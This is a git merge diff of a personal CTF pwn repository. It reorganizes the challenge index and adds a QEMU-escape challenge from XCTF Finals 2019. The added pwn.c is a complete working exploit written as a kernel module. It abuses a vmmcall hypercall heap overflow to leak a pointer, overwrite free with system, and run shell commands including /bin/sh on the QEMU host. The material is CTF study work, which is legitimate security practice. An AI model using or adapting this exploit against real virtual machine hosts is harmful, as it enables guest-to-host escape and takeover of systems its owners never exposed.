merge

README.md

@@ -4,15 +4,20 @@ Some of my ctf pwn challenge collections.
 
 ## Index
 
+- [ASIS CTF Finals 2018 - Modern KeX](./kernel/KeX)
+- [Gnote - TWCTF 2019](./kernel/gnote)
+- [\*CTF Finals 2019 - Hack Me](./kernel/hackme)
+- [P4 Teaser CONFidence CTF - p4fmt](./kernel/p4fmt)
+- [Kpets - Facebook CTF 2019](./kernel/kpets)
+- [Blazeme - Blaze CTF 2018](./kernel/blazeme)
+- [QTCG - XCTF Finals 2019](./escape/QTCG)
 - [Plaid CTF 2019 - Spectre](./cpu/spectre)
 - [SECCON 2019 Quals - Random Pitfalls](./cpu/random_pitfalls)
 - [Car Market - ASIS CTF 2016 Finals](./heap/off-by-one/carmarket)
 - [PoE - Hitcon Quals 2019](./escape/PoE)
 - [Defcon CTF 2019 Finals - Aoool](./type-confusion/aoool)
 - [Defcon CTF 2019 Finals - Babi](./heap/heap-multi/babi)
-- [Gnote - TWCTF 2019](./escape/gnote)
 - [LCARS - DEF CON CTF Quals 2019](./escape/LCARS)
-- [ASIS CTF Finals 2018 - Modern KeX](./escape/KeX)
 - [HXP 2018 - Green Computing I](./escape/GreenComputing)
 - [Asis CTF 2016 - Funpwn](./type-confusion/funpwn)
 - [Mult-o-flow - Hack.lu 2017](./rop-strict/mult-o-flow)
@@ -39,8 +44,6 @@ Some of my ctf pwn challenge collections.
 - [Heaps of print - Hack.lu 2017](./format-string/heapsofprint)
 - [X-nuca 2018 - SSD](./escape/ssd)
 - [SECCON 2018 - Q-Escape](./escape/q-escape)
-- [P4 Teaser CONFidence CTF - p4fmt](./escape/p4fmt)
-- [\*CTF Finals 2019 - Hack Me](./escape/hackme)
 - [Hitcon 2018 - Abyss](./escape/abyss)
 - [Vertical Takeoff Vertical Landing - CodeBlue 2017](./environ-tricks/VTVL)
 - [House of Card - 0ctf 2018](./environ-tricks/house_of_c4rd)

escape/QTCG/Makefile

@@ -0,0 +1,7 @@
+obj-m = pwn.o
+all: build
+
+build:
+	make -C ./linux-5.0.5 M=$(PWD) modules
+clean:
+	make -C ./linux-5.0.5 M=$(PWD) clean

escape/QTCG/README.md

@@ -0,0 +1,7 @@
+# QTCG - XCTF Finals 2019
+
+This challenge implements a hypercall with `vmmcall` instruction in QEMU TCG. Main logic is in `helper_vmmcall2`.
+To call this function, we need to execute `vmmcall` in kernel space and pass argument via `rax`, `rdi`, `rsi` and `rdx`.
+The vulnerability is trival that there is arbitrary heap overflow, we can modify `free` pointer to `system`.
+
+My exploit is a kernel module `pwn.c`. To build `.ko`, we need `linux-5.0.5` source code with `make modules_prepare` executed. The exploit will launch when executing `insmod`, it is quite unstable.

escape/QTCG/pwn.c

@@ -0,0 +1,98 @@
+#include <linux/init.h> 
+#include <linux/module.h>       
+#include <linux/device.h>         
+#include <linux/kernel.h>         
+#include <linux/fs.h>             
+#include <linux/uaccess.h> 
+#include <linux/slab.h>
+#define BUFSIZE 0x100000
+
+MODULE_LICENSE("GPL"); 
+MODULE_AUTHOR("BrieflyX");
+MODULE_DESCRIPTION("Pwn kernel module"); 
+MODULE_VERSION("0.1");
+
+static char *gbuf = NULL;
+
+static long hcall(int nr, uint64_t arg1, uint64_t arg2, uint64_t arg3) {
+  long ret;
+  asm volatile ( "movl %1, %%eax\n"
+      "movq %2, %%rdi\n"
+      "movq %3, %%rsi\n"
+      "movq %4, %%rdx\n"
+      "vmmcall\n"
+      "mov %%rax, %0\n"
+      :"=r"(ret)       /* output */
+      :"r"(nr), "r"(arg1), "r"(arg2), "r"(arg3) /* input */
+      :"%eax", "%rdi", "%rsi", "%rdx"           /* clobbered register */
+    );
+  return ret;
+}
+
+long alloc(uint64_t size) {
+  return hcall(3, size, 0, 0);
+}
+
+long write_to_host(void * addr, uint64_t size) {
+  return hcall(1, addr, size, 0);
+}
+
+long read_from_host(void * addr, uint64_t size) {
+  return hcall(2, addr, size, 0);
+}
+
+static int __init pwn_init(void){
+  printk(KERN_INFO "Exploit begins\n");
+
+  gbuf = kmalloc(BUFSIZE, GFP_KERNEL);
+  uint64_t addr = virt_to_phys(gbuf);
+  printk(KERN_INFO "[+] Physical address 0x%lx\n", addr);
+
+  int bufsize = 0x8000;
+  uint64_t free = 0;
+  uint64_t system = 0;
+  uint64_t i, idx = 0;
+  uint64_t *arr = (uint64_t *)gbuf;
+
+  alloc(0x17);
+  read_from_host(addr, bufsize);
+
+  // Search heap
+  for (i = 0; i < (bufsize / 8) - 3; i++) {
+    // printk(KERN_INFO "arr[%d]=%llx\n", i, arr[i]);
+    if (arr[i] == 0x24 && arr[i+1] == 0x17) {
+      if ((arr[i+2] >> 40) == 0x7f) {
+        printk(KERN_INFO "Find one 0x%lx\n", arr[i+2]);
+        free = arr[i+2];
+        idx = i+2;
+        break;
+      }
+    }
+  }
+
+  if (free != 0) {
+    // Pwn it!
+    system = free - 0x97950 + 0x4f440;
+    printk(KERN_INFO "System @ %lx\n", system);
+    arr[idx] = system;
+    strcpy(gbuf, "ls; cat *flag*; /bin/sh\0");
+
+    write_to_host(addr, bufsize);
+
+    // Trigger system
+    hcall(4, 0, 0, 0);
+    return 0;
+
+  } else {
+    printk(KERN_INFO "Exploit failed!\n");
+  }
+
+  return 0;
+}
+
+static void __exit pwn_exit(void){
+   printk(KERN_INFO "pwn: Goodbye from the LKM!\n");
+}
+
+module_init(pwn_init);
+module_exit(pwn_exit);

escape/QTCG/run.sh

@@ -0,0 +1,3 @@
+#!/bin/sh
+
+./qemu-system-x86_64 -initrd ./initramfs-busybox-x64.cpio.gz -nographic -kernel ./vmlinuz-5.0.5-generic -append "priority=low console=ttyS0" -monitor /dev/null

escape/README.md

@@ -1,3 +1,3 @@
 # Escape Related or Privilege Escalation
 
-Become root, own the kernel, and escape from vm.
+Escaping related problem, mostly qemu escape.

kernel/README.md

@@ -0,0 +1,3 @@
+# Kernel Pwn
+
+Becoming root!

kernel/blazeme/README.md

@@ -0,0 +1,3 @@
+# Blazeme - Blaze CTF 2018
+
+External writeup: https://devcraft.io/2018/04/25/blazeme-blaze-ctf-2018.html

kernel/kpets/README.md

@@ -0,0 +1,3 @@
+# Kpets - Facebook CTF 2019
+
+External writeup: https://github.com/pr0cf5/CTF-writeups/tree/master/2019/fbctf/kpets